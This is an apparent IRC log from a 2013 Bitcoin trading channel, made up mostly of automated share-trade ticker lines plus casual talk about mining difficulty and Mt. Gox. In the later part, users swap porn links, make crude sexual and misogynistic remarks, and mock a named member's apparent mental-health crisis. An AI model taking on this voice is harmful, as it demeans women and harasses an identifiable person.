00:48:15 wat May 31 00:48:45 oh. only !bitcoin transactions May 31 00:48:48 eh, wont hurt them May 31 00:48:52 carefactor 0 May 31 00:48:59 the mtgox id crap has nothing to do with "money launderers", etc May 31 00:49:00 dub i thought they're announcing karpeles was arrestedf May 31 00:49:06 thought it'd be a little soon. May 31 00:49:07 LOL May 31 00:49:16 it is about fattening USG's "meatspace to BTC addr" database. May 31 00:49:33 already quite fat, I imagine May 31 00:49:43 everyday we don't hear about tux exploding from too may french fries is a miracle May 31 00:54:02 [HAVELOCK] [ASICM] 40 @ 0.02469 = 0.9876 BTC [+] May 31 00:54:39 Hey! May 31 00:54:39 My idea is to create a 3D MMORPG like Runes of Magic or WoW, using Esenthel. Of course it would have some unique features. May 31 00:55:17 wat May 31 00:55:24 what the world needs now? May 31 00:55:28 [HAVELOCK] [ASICM] 1 @ 0.02469 BTC [+] May 31 00:55:30 [HAVELOCK] [ASICM] 38 @ 0.0246 = 0.9348 BTC [-] May 31 00:55:48 myeah. May 31 00:56:06 [MPEX] [S.MPOE] 8000 @ 0.0007226 = 5.7808 BTC [-] May 31 00:56:18 well... at least his idea isn't creating a bitcoin bank like nasdaq or nyfed, using birtcoin. May 31 00:56:29 [HAVELOCK] [ASICM] 50 @ 0.0247 = 1.235 BTC [+] May 31 00:56:30 (of course it would have some unique bugs) May 31 00:57:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.024743 BTC [+] May 31 01:02:00 [BTCTC] [RSM] 1 @ 0.006273 BTC [-] May 31 01:03:42 [BTCTC] [PAJKA.BOND] 70 @ 0.11 = 7.7 BTC [+] May 31 01:04:47 [BTCTC] [RSM] 13 @ 0.009715 = 0.1263 BTC [+] May 31 01:04:49 [BTCTC] [RSM] 10 @ 0.009716 = 0.0972 BTC [+] May 31 01:04:51 [BTCTC] [RSM] 1 @ 0.00972 BTC [+] May 31 01:05:45 [BTCTC] [TAT.ASICMINER] 9 @ 0.024743 = 0.2227 BTC [+] May 31 01:10:34 when was the last time mining diff went down? May 31 01:11:04 3.27 to 2.9 was the last one I remember May 31 01:11:19 few months ago May 31 01:11:33 approx May 31 01:11:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.024743 = 0.1732 BTC [+] May 31 01:12:03 i think it was after the halving May 31 01:12:09 in january May 31 01:12:18 no, there was one after that, it went down May 31 01:12:42 the fork? May 31 01:12:42 ;;bc,stats May 31 01:12:44 halving was in late November May 31 01:12:57 [BTCTC] [S.MPOE-PT] 24 @ 0.000709 = 0.017 BTC [-] May 31 01:12:57 [BTCTC] [S.MPOE-PT] 376 @ 0.00071 = 0.267 BTC [+] May 31 01:13:08 no, I don't think that caused a drop May 31 01:13:59 http://bitcoin.sipa.be/speed-lin.png May 31 01:14:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02465 BTC [-] May 31 01:16:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.02465 = 0.074 BTC [-] May 31 01:16:38 [MPEX] [S.MPOE] 6700 @ 0.00072231 = 4.8395 BTC [-] May 31 01:17:21 thx dub May 31 01:20:14 never in my life have i seen anyone more stubborn May 31 01:20:50 basically it never went down. May 31 01:21:48 you havent been around mp enough fiat500 May 31 01:21:53 ;) May 31 01:22:48 [BTCTC] [CRYPTO-TRADE] 100 @ 0.2 = 20 BTC [+] May 31 01:23:21 lol May 31 01:23:34 [BTCTC] [CRYPTO-TRADE] 100 @ 0.2 = 20 BTC [+] May 31 01:23:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.02465 = 0.074 BTC [-] **** BEGIN LOGGING AT Fri May 31 01:30:04 2013 May 31 01:30:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.024742 = 0.0495 BTC [+] May 31 01:33:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 31 01:34:00 [MPEX] [S.MPOE] 3400 @ 0.00072231 = 2.4559 BTC [-] May 31 01:34:02 [MPEX] [S.MPOE] 1864 @ 0.00072223 = 1.3462 BTC [-] May 31 01:34:05 [MPEX] [S.MPOE] 3136 @ 0.00072109 = 2.2613 BTC [-] May 31 01:34:18 [HAVELOCK] [SDICE] 4 @ 0.18 = 0.72 BTC [-] May 31 01:34:36 [HAVELOCK] [VTX] 1 @ 0.4397 BTC [+] May 31 01:34:53 [HAVELOCK] [ASICM] 10 @ 0.02469949 = 0.247 BTC [-] May 31 01:34:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.024742 = 0.1237 BTC [+] May 31 01:35:04 [HAVELOCK] [ASICM] 1 @ 0.02469949 BTC [-] May 31 01:37:57 [HAVELOCK] [ASICM] 2 @ 0.02430011 = 0.0486 BTC [-] May 31 01:37:58 [HAVELOCK] [ASICM] 78 @ 0.0243001 = 1.8954 BTC [-] May 31 01:37:59 [HAVELOCK] [ASICM] 20 @ 0.0243 = 0.486 BTC [-] May 31 01:38:55 [BTCTC] [TAT.ASICMINER] 13 @ 0.024742 = 0.3216 BTC [+] May 31 01:39:09 [HAVELOCK] [ASICM] 280 @ 0.0243 = 6.804 BTC [-] May 31 01:39:10 [HAVELOCK] [ASICM] 113 @ 0.0243 = 2.7459 BTC [-] May 31 01:39:11 [HAVELOCK] [ASICM] 7 @ 0.02420005 = 0.1694 BTC [-] May 31 01:39:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.024743 = 0.2969 BTC [+] May 31 01:40:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 31 01:40:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.0246 = 0.0492 BTC [-] May 31 01:40:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.024556 = 0.1473 BTC [-] May 31 01:40:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.024556 = 0.0491 BTC [-] May 31 01:40:45 [BTCTC] [TAT.ASICMINER] 34 @ 0.024555 = 0.8349 BTC [-] May 31 01:40:53 [BTCTC] [TAT.ASICMINER] 23 @ 0.024554 = 0.5647 BTC [-] May 31 01:40:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.024554 = 0.0737 BTC [-] May 31 01:40:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.02455 = 0.2455 BTC [-] May 31 01:41:05 [BTCTC] [TAT.ASICMINER] 12 @ 0.024512 = 0.2941 BTC [-] May 31 01:41:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.024512 BTC [-] May 31 01:41:11 [BTCTC] [TAT.ASICMINER] 9 @ 0.024512 = 0.2206 BTC [-] May 31 01:41:13 [HAVELOCK] [ASICM] 72 @ 0.02420005 = 1.7424 BTC [-] May 31 01:41:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.02451 = 0.4902 BTC [-] May 31 01:41:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.02451 = 0.1471 BTC [-] May 31 01:41:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.02451 = 0.0735 BTC [-] May 31 01:41:22 [BTCTC] [TAT.ASICMINER] 15 @ 0.0245 = 0.3675 BTC [-] May 31 01:41:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0245 = 0.049 BTC [-] May 31 01:41:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.0245 = 0.147 BTC [-] May 31 01:41:35 [HAVELOCK] [ASICM] 210 @ 0.02420003 = 5.082 BTC [-] May 31 01:41:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.0245 = 0.49 BTC [-] May 31 01:41:39 [BTCTC] [TAT.ASICMINER] 11 @ 0.024413 = 0.2685 BTC [-] May 31 01:41:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.0244 = 0.244 BTC [-] May 31 01:42:06 [BTCTC] [TAT.ASICMINER] 13 @ 0.0244 = 0.3172 BTC [-] May 31 01:42:09 [BTCTC] [TAT.ASICMINER] 45 @ 0.02436 = 1.0962 BTC [-] May 31 01:42:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.02435 = 1.2175 BTC [-] May 31 01:42:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.02432 = 0.2432 BTC [-] May 31 01:42:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.02431 = 0.2431 BTC [-] May 31 01:42:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02451 = 0.1226 BTC [+] May 31 01:42:47 [BTCTC] [TAT.ASICMINER] 15 @ 0.024401 = 0.366 BTC [-] May 31 01:42:52 bwaghaha doods : http://play-dune.com/ May 31 01:43:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.024401 = 0.122 BTC [-] May 31 01:44:05 heh May 31 01:44:10 I beat that game long ago May 31 01:44:41 [BTCTC] [ASICMINER-PT] 1 @ 2.445001 BTC [-] May 31 01:44:42 ya lol, 20 years ago May 31 01:44:43 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [-] May 31 01:44:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4401 BTC [-] May 31 01:44:45 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [-] May 31 01:44:47 [BTCTC] [ASICMINER-PT] 2 @ 2.4303 = 4.8606 BTC [-] May 31 01:44:48 [BTCTC] [ASICMINER-PT] 1 @ 2.4302 BTC [-] May 31 01:44:50 [BTCTC] [ASICMINER-PT] 25 @ 2.4301 = 60.7525 BTC [-] May 31 01:44:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.024401 = 0.122 BTC [-] May 31 01:44:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.0245 = 0.0735 BTC [+] May 31 01:44:55 [BTCTC] [TAT.ASICMINER] 30 @ 0.02412 = 0.7236 BTC [-] May 31 01:45:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.02412 = 0.0724 BTC [-] May 31 01:45:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.024111 = 0.1929 BTC [-] May 31 01:48:08 [BTCTC] [GSDPT] 10 @ 0.003447 = 0.0345 BTC [-] May 31 01:48:28 [BTCTC] [GSDPT] 10 @ 0.003448 = 0.0345 BTC [+] May 31 01:48:51 [HAVELOCK] [ASICM] 1 @ 0.02412275 BTC [-] May 31 01:51:02 [BTCTC] [ASICMINER-PT] 1 @ 2.474999 BTC [+] May 31 01:51:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.024698 = 0.1235 BTC [+] May 31 01:51:14 [BTCTC] [BTC-BOND] 6 @ 0.01 = 0.06 BTC [-] May 31 01:52:04 [BTCTC] [ASICMINER-PT] 2 @ 2.474999 = 4.95 BTC [+] May 31 01:53:36 [BTCTC] [ASICMINER-PT] 2 @ 2.474999 = 4.95 BTC [+] May 31 01:59:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.024696 = 0.0741 BTC [-] May 31 01:59:18 [BTCTC] [CRYPTO-TRADE] 8 @ 0.2 = 1.6 BTC [+] May 31 02:00:34 [MPEX] [S.MPOE] 3700 @ 0.00072242 = 2.673 BTC [+] May 31 02:07:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.024689 BTC [-] May 31 02:08:37 [BTCTC] [S.DICE-PT] 3 @ 0.002899 = 0.0087 BTC [+] May 31 02:08:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.024689 = 0.0988 BTC [-] May 31 02:11:29 [BTCTC] [ASICMINER-PT] 1 @ 2.430001 BTC [-] May 31 02:11:31 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [+] May 31 02:11:41 [BTCTC] [ASICMINER-PT] 3 @ 2.47 = 7.41 BTC [+] May 31 02:11:43 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [+] May 31 02:11:52 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 31 02:12:05 [BTCTC] [ASICMINER-PT] 3 @ 2.476998 = 7.431 BTC [+] May 31 02:12:25 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] May 31 02:12:29 [BTCTC] [ASICMINER-PT] 3 @ 2.477 = 7.431 BTC [+] May 31 02:20:21 [HAVELOCK] [ASICM] 4 @ 0.02361 = 0.0944 BTC [-] May 31 02:21:10 [BTCTC] [ASICMINER-PT] 1 @ 2.476999 BTC [-] May 31 02:21:38 [BTCTC] [ASICMINER-PT] 2 @ 2.476999 = 4.954 BTC [-] May 31 02:21:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.024211 BTC [-] May 31 02:21:56 [HAVELOCK] [ASICM] 1 @ 0.02361 BTC [-] May 31 02:23:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.024679 = 0.074 BTC [+] May 31 02:23:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.024211 = 0.2663 BTC [-] May 31 02:26:10 [HAVELOCK] [ASICM] 154 @ 0.02361 = 3.6359 BTC [-] May 31 02:26:12 [HAVELOCK] [ASICM] 1 @ 0.0235909 BTC [-] May 31 02:26:50 [HAVELOCK] [ASICM] 1 @ 0.0235909 BTC [-] May 31 02:29:31 [HAVELOCK] [ASICM] 1 @ 0.0235642 BTC [-] May 31 02:29:52 [HAVELOCK] [HIM] 1 @ 2.66 BTC [+] May 31 02:31:06 [BTCTC] [BITVPS] 23 @ 0.000712 = 0.0164 BTC [-] May 31 02:33:41 [HAVELOCK] [ASICM] 78 @ 0.0235909 = 1.8401 BTC [+] May 31 02:33:41 [HAVELOCK] [ASICM] 91 @ 0.02361 = 2.1485 BTC [+] May 31 02:35:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.024211 = 0.1937 BTC [-] May 31 02:39:06 [BTCTC] [ASICMINER-PT] 1 @ 2.427701 BTC [-] May 31 02:39:09 [BTCTC] [ASICMINER-PT] 1 @ 2.4277 BTC [-] May 31 02:39:11 [BTCTC] [ASICMINER-PT] 1 @ 2.427535 BTC [-] May 31 02:39:12 [BTCTC] [ASICMINER-PT] 7 @ 2.427517 = 16.9926 BTC [-] May 31 02:41:24 [BTCTC] [S.BBET-PT] 1 @ 0.00219 BTC [-] May 31 02:41:36 [HAVELOCK] [SDICE] 14 @ 0.1807 = 2.5298 BTC [+] May 31 02:41:53 [BTCTC] [S.BBET-PT] 2 @ 0.002199 = 0.0044 BTC [+] May 31 02:43:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.024211 = 0.1695 BTC [-] May 31 02:45:45 [MPEX] [S.MPOE] 5014 @ 0.00072109 = 3.6155 BTC [-] May 31 02:45:46 [MPEX] [S.MPOE] 12100 @ 0.00072085 = 8.7223 BTC [-] May 31 02:47:02 [BTCTC] [ASICMINER-PT] 2 @ 2.427517 = 4.855 BTC [-] May 31 02:47:05 [BTCTC] [ASICMINER-PT] 2 @ 2.427505 = 4.855 BTC [-] May 31 02:53:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.024211 = 0.0968 BTC [-] May 31 02:55:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.024209 = 0.0968 BTC [-] May 31 02:55:46 [HAVELOCK] [ASICM] 4 @ 0.0239 = 0.0956 BTC [+] May 31 03:01:55 [HAVELOCK] [ASICM] 42 @ 0.0239 = 1.0038 BTC [+] May 31 03:02:31 [HAVELOCK] [ASICM] 1 @ 0.0236 BTC [-] May 31 03:09:30 [BTCTC] [ASICMINER-PT] 4 @ 2.421 = 9.684 BTC [-] May 31 03:11:40 [BTCTC] [S.DICE-PT] 7 @ 0.002899 = 0.0203 BTC [+] May 31 03:12:15 [BTCTC] [S.DICE-PT] 6 @ 0.0029 = 0.0174 BTC [+] May 31 03:13:12 [BTCTC] [S.DICE-PT] 15 @ 0.00292 = 0.0438 BTC [+] May 31 03:13:24 [BTCTC] [TAT.ASICMINER] 16 @ 0.024211 = 0.3874 BTC [+] May 31 03:15:01 [BTCTC] [GSDPT] 2 @ 0.003449 = 0.0069 BTC [+] May 31 03:19:49 [BTCTC] [S.DICE-PT] 4 @ 0.002931 = 0.0117 BTC [+] May 31 03:20:47 [MPEX] [S.MPOE] 412 @ 0.00071758 = 0.2956 BTC [-] May 31 03:21:17 http://www.bloomberg.com/news/2013-05-30/bitcoin-the-perfect-schmuck-insurance.html May 31 03:21:36 [BTCTC] [S.DICE-PT] 70 @ 0.002932 = 0.2052 BTC [+] May 31 03:22:19 [BTCTC] [BTC-BOND] 21 @ 0.01 = 0.21 BTC [-] May 31 03:22:49 [BTCTC] [S.DICE-PT] 3 @ 0.002932 = 0.0088 BTC [+] May 31 03:23:53 they use the idish word in a title now ?! May 31 03:24:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.024211 BTC [+] May 31 03:26:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.024209 BTC [-] May 31 03:27:55 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [+] May 31 03:32:55 [MPEX] [S.MPOE] 5628 @ 0.00072136 = 4.0598 BTC [+] May 31 03:35:27 sign of the end days eh mircea_popescu May 31 03:35:29 lol May 31 03:38:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.024211 = 0.0726 BTC [+] May 31 03:40:38 lol. **** BEGIN LOGGING AT Fri May 31 13:57:18 2013 May 31 13:57:46 ;;ticker May 31 13:57:46 BTCUSD ticker | Best bid: 128.40012, Best ask: 128.95000, Bid-ask spread: 0.54988, Last trade: 128.99999, 24 hour volume: 23586.79567077, 24 hour low: 126.50000, 24 hour high: 131.99000, 24 hour vwap: 128.86053 May 31 13:59:35 [BTCTC] [TAT.ASICMINER] 27 @ 0.024787 = 0.6692 BTC [-] May 31 14:19:11 F'N INTERNET EXPLORER DIE THEN BURN IN HELL May 31 14:20:33 2. SUSPENSION OF ALL ACTIVITIES OF THE RPIETILA SUPERNODE May 31 14:20:33 Rpietila supernode will be dissolved effective immediately. "From now one, everybody smokes his own cigars". It is still possible to continue spending my money that I have given to your personal possession, according to my previous orders, but I will require the accounts later. May 31 14:20:42 awwww. the supernode ;/ May 31 14:22:05 Whats that mean May 31 14:22:46 I thought that supernodes can't be dissolved May 31 14:22:49 meaningfully ? nothing. May 31 14:22:59 laws of physics n shit May 31 14:23:01 Scrat so did i. these diodes be faulty. May 31 14:38:08 Bitcoin Supernode (n): It's when you believe yourself to be an extremely important person, then completely fuck up a simple get-together screaming bloody murder, fleeing from a luxury hotel because you believe they are out to kill you when they turn off your water after you've made a complete mess of the place and deny paying your bills, then keep mumbling about how you and your friends May 31 14:38:09 are armed and trained as soldiers and eventually get checked into a mental instituation. That's when you're a bitcoin supernode. May 31 14:39:48 sounds more like a superchode. May 31 14:40:44 anyway, they didn't turn off the water, they turned off room service May 31 14:40:48 this because the person refused to pay. May 31 14:41:33 [MPEX] [S.MPOE] 4900 @ 0.00071934 = 3.5248 BTC [-] May 31 14:41:53 thats okay dude, its all starting to make sense now..i'm sure they'll forget all about you and that incident. May 31 14:42:21 KRS-1 who off my ignore list are you entertaining ? May 31 14:43:16 mircea_popescu: I believe KRS-1 is making the case to be put on said ignore list May 31 14:43:27 oh come on its a joke May 31 14:44:10 lol wait what, i'm mpoe-pr AND tortilla ?! May 31 14:45:24 heh May 31 14:46:42 im pretty sure it was teh goons tbh. May 31 14:51:41 ok May 31 14:52:27 can i just have one more pr0ns link before i go May 31 14:52:50 maybe something shocking May 31 14:53:01 not trilemas May 31 14:53:21 dAt-ing May 31 14:53:31 i forgot teh link May 31 14:54:41 woa you must not be in the US to see balls May 31 14:55:01 we dont like balls in the U.S. May 31 14:55:15 plus international pr0ns has moar hair May 31 14:55:25 hmm May 31 14:55:31 wut? May 31 14:55:43 http://polimedia.us/dtng/c/src/12824537362.jpg May 31 14:55:44 there. May 31 14:57:16 for a really good one thats not too graphic but extremely erotic- The Seduction of Misty Mundae (Video 2004) - IMDb May 31 14:57:26 this girl asks her aunt to help her experiment with girls May 31 14:57:41 good one to watch with your g/f or something May 31 14:58:21 HEH good one..thanks for the link again I'll have to book mark this time..this pic reminds me i'm due for another visit to flashdance, the one strip club i go to May 31 14:58:32 oh you have a partner May 31 14:58:45 as in.. May 31 14:59:11 heh its cool dude May 31 15:00:16 (i have a dry sense of humor) May 31 15:00:34 [HAVELOCK] [ASICM] 10 @ 0.02468 = 0.2468 BTC [+] May 31 15:01:33 Lewis Black? May 31 15:01:37 He's a f'n trip May 31 15:03:55 hmm i have to see who that is May 31 15:06:33 i was watching a different one May 31 15:10:35 [BTCTC] [S.DICE-PT] 100 @ 0.0028 = 0.28 BTC [-] May 31 15:10:39 [BTCTC] [S.DICE-PT] 133 @ 0.00276 = 0.3671 BTC [-] May 31 15:10:41 [BTCTC] [S.DICE-PT] 350 @ 0.002757 = 0.965 BTC [-] May 31 15:10:43 [BTCTC] [S.DICE-PT] 7 @ 0.002747 = 0.0192 BTC [-] May 31 15:10:45 [BTCTC] [S.DICE-PT] 4 @ 0.002746 = 0.011 BTC [-] May 31 15:10:50 [BTCTC] [S.DICE-PT] 6 @ 0.002745 = 0.0165 BTC [-] May 31 15:10:51 [BTCTC] [S.DICE-PT] 10 @ 0.0027 = 0.027 BTC [-] May 31 15:10:52 [BTCTC] [S.DICE-PT] 50 @ 0.0026 = 0.13 BTC [-] May 31 15:10:54 [BTCTC] [S.DICE-PT] 20 @ 0.002505 = 0.0501 BTC [-] May 31 15:10:55 [BTCTC] [S.DICE-PT] 100 @ 0.002503 = 0.2503 BTC [-] May 31 15:10:57 [BTCTC] [S.DICE-PT] 50 @ 0.002502 = 0.1251 BTC [-] May 31 15:10:58 [BTCTC] [S.DICE-PT] 100 @ 0.0024 = 0.24 BTC [-] May 31 15:12:59 remember when the 80's had aerobics tv shows in females wearing thongs and what not May 31 15:13:06 it was on regular TV here in the states May 31 15:13:20 That..is when I became a man. May 31 15:15:13 some do May 31 15:15:29 but not like guys May 31 15:15:44 truff1es: there's also this thing called penis envy May 31 15:16:17 i've seen polimedia..there are womens with big clits that look like small penis May 31 15:16:33 lol, roids have that effect May 31 15:16:33 makes me think twice about going downtown May 31 15:16:37 google penoris May 31 15:17:09 good god man i wish i hadn't now..this is kind of an issue with me..they look just like peniseses May 31 15:17:35 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] May 31 15:17:53 [BTCTC] [S.MPOE-PT] 16 @ 0.000709 = 0.0113 BTC [-] May 31 15:19:46 wat is this May 31 15:20:05 11 old i years am May 31 15:21:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] May 31 15:21:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.024692 BTC [-] May 31 15:21:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.024691 = 0.4938 BTC [-] May 31 15:21:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.02469 = 0.0494 BTC [-] May 31 15:21:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02469 = 0.0494 BTC [-] May 31 15:21:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.024607 = 0.2461 BTC [-] May 31 15:21:45 [BTCTC] [TAT.ASICMINER] 19 @ 0.024601 = 0.4674 BTC [-] May 31 15:21:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.0246 = 0.123 BTC [-] May 31 15:21:55 [BTCTC] [TAT.ASICMINER] 16 @ 0.0246 = 0.3936 BTC [-] May 31 15:22:01 [BTCTC] [TAT.ASICMINER] 7 @ 0.024551 = 0.1719 BTC [-] May 31 15:22:14 you know whats wrong with this world...women body builders..they need to fuck off and get a life. Last thing some dude needs is to get his ass kicked by a roided up bitch. May 31 15:23:03 of course, there's a fetish for everything May 31 15:25:54 http://img.perezhilton.com/wp-content/uploads/2007/10/aabonaduce02__oPt.jpg May 31 15:26:29 [BTCTC] [ASICMINER-PT] 1 @ 2.471 BTC [+] May 31 15:30:12 [MPEX] [S.MPOE] 5477 @ 0.00071877 = 3.9367 BTC [-] May 31 15:30:14 [MPEX] [S.MPOE] 439 @ 0.00071771 = 0.3151 BTC [-] May 31 15:41:21 [HAVELOCK] [ASICM] 1 @ 0.02468 BTC [+] May 31 15:44:43 [MPEX] [S.MPOE] 12200 @ 0.00071934 = 8.7759 BTC [+] May 31 15:45:34 [HAVELOCK] [HIM] 1 @ 2.689 BTC [-] May 31 15:47:46 asciilifeform http://trilema.com/2013/a-very-brief-history-of-conceptual-psychoabuse/ May 31 15:56:36 [HAVELOCK] [ASICM] 1 @ 0.02468 BTC [+] May 31 15:59:59 [HAVELOCK] [ASICM] 2 @ 0.02468 = 0.0494 BTC [+] May 31 16:01:20 http://hexus.net/tech/items/displays/55965-asus-launches-pq321-monitor-3840-x-2160-igzo-display/ May 31 16:02:08 [MPEX] [S.MPOE] 9380 @ 0.00071771 = 6.7321 BTC [-] May 31 16:02:09 [MPEX] [S.MPOE] 10320 @ 0.00071765 = 7.4061 BTC [-] May 31 16:08:48 tiniest icons ever! May 31 16:08:53 [BTCTC] [ASICMINER-PT] 1 @ 2.473 BTC [+] May 31 16:08:57 [MPEX] [S.MPOE] 12900 @ 0.00071934 = 9.2795 BTC [+] May 31 16:09:49 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] May 31 16:10:24 [HAVELOCK] [ASICM] 22 @ 0.02468 = 0.543 BTC [+] May 31 16:12:53 [BTCTC] [S.MPOE-PT] 2 @ 0.000709 = 0.0014 BTC [-] May 31 16:15:49 [HAVELOCK] [ASICM] 2 @ 0.02468 = 0.0494 BTC [+] May 31 16:25:28 [HAVELOCK] [ASICM] 1 @ 0.024689 BTC [+] May 31 16:28:53 [BTCTC] [ASICMINER-PT] 1 @ 2.475488 BTC [+] May 31 16:29:05 [BTCTC] [ASICMINER-PT] 1 @ 2.475489 BTC [+] May 31 16:29:08 [BTCTC] [ASICMINER-PT] 2 @ 2.475495 = 4.951 BTC [+] May 31 16:29:10 [BTCTC] [ASICMINER-PT] 14 @ 2.475499 = 34.657 BTC [+] May 31 16:29:12 [BTCTC] [ASICMINER-PT] 1 @ 2.475499 BTC [+] May 31 16:30:14 [BTCTC] [BASIC-MINING] 3 @ 0.65 = 1.95 BTC [+] May 31 16:31:11 [BTCTC] [ASICMINER-PT] 1 @ 2.4755 BTC [+] May 31 16:32:22 [BTCTC] [ASICMINER-PT] 1 @ 2.4754 BTC [-] May 31 16:32:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.024552 = 0.0982 BTC [+] May 31 16:32:24 [BTCTC] [ASICMINER-PT] 3 @ 2.4755 = 7.4265 BTC [+] May 31 16:33:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.024789 BTC [+] May 31 16:33:59 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [+] May 31 16:34:04 [BTCTC] [S.BBET-PT] 16 @ 0.0022 = 0.0352 BTC [+] May 31 16:34:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.024789 = 0.0992 BTC [+] May 31 16:35:10 [HAVELOCK] [HIM] 2 @ 2.7 = 5.4 BTC [+] May 31 16:35:12 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [-] May 31 16:35:14 [BTCTC] [ASICMINER-PT] 1 @ 2.4754 BTC [+] May 31 16:35:15 [BTCTC] [ASICMINER-PT] 2 @ 2.4755 = 4.951 BTC [+] May 31 16:37:33 [HAVELOCK] [ASICM] 28 @ 0.02468 = 0.691 BTC [-] May 31 16:41:13 [BTCTC] [S.MPOE-PT] 1 @ 0.000709 BTC [-] May 31 16:44:00 [HAVELOCK] [ASICM] 2 @ 0.024689 = 0.0494 BTC [+] May 31 16:46:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.024789 = 0.0744 BTC [+] May 31 16:46:52 [BTCTC] [TAT.ASICMINER] 17 @ 0.0248 = 0.4216 BTC [+] May 31 16:47:59 [HAVELOCK] [ASICM] 1 @ 0.024689 BTC [+] May 31 16:49:53 [BTCTC] [CRYPTO-TRADE] 100 @ 0.2 = 20 BTC [+] May 31 16:50:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 31 16:55:43 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 31 16:57:24 [BTCTC] [BITVPS] 10 @ 0.000705 = 0.0071 BTC [-] May 31 16:57:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] May 31 17:00:52 [BTCTC] [ASICMINER-PT] 1 @ 2.4755 BTC [+] May 31 17:01:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.0248 = 0.1736 BTC [+] May 31 17:03:57 [BTCTC] [BITVPS] 10 @ 0.00067 = 0.0067 BTC [-] May 31 17:04:51 lol i get tons of hits referred by coinurl.. looks like someone actually paid coinurl to place his coinbr referral :D May 31 17:05:11 [BTCTC] [S.DICE-PT] 20 @ 0.002501 = 0.05 BTC [+] May 31 17:05:29 how can i check how the ad actually looks, does anyone know? May 31 17:05:47 [BTCTC] [S.DICE-PT] 10 @ 0.0025 = 0.025 BTC [-] May 31 17:06:16 [BTCTC] [S.DICE-PT] 10 @ 0.002401 = 0.024 BTC [-] May 31 17:06:18 [HAVELOCK] [ASICM] 68 @ 0.024689 = 1.6789 BTC [+] May 31 17:06:33 [HAVELOCK] [ASICM] 32 @ 0.02475 = 0.792 BTC [+] May 31 17:07:28 [BTCTC] [S.MPOE-PT] 50 @ 0.000665 = 0.0333 BTC [-] May 31 17:07:29 [BTCTC] [S.MPOE-PT] 100 @ 0.000665 = 0.0665 BTC [-] May 31 17:07:59 [BTCTC] [S.MPOE-PT] 130 @ 0.000664 = 0.0863 BTC [-] May 31 17:08:45 found only this http://coinurl.com/stats-ad-list.php?page=4&type=interstitial, https://coinurl.com/stats-ad-list.php?page=6&type=banner May 31 17:08:58 lol bitbet ref is there too :D May 31 17:09:07 free advertising. me gusta. May 31 17:10:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0248 = 0.0496 BTC [+] May 31 17:10:28 [HAVELOCK] [ASICM] 2 @ 0.02499998 = 0.05 BTC [+] May 31 17:10:43 [BTCTC] [TAT.ASICMINER] 61 @ 0.0246 = 1.5006 BTC [-] May 31 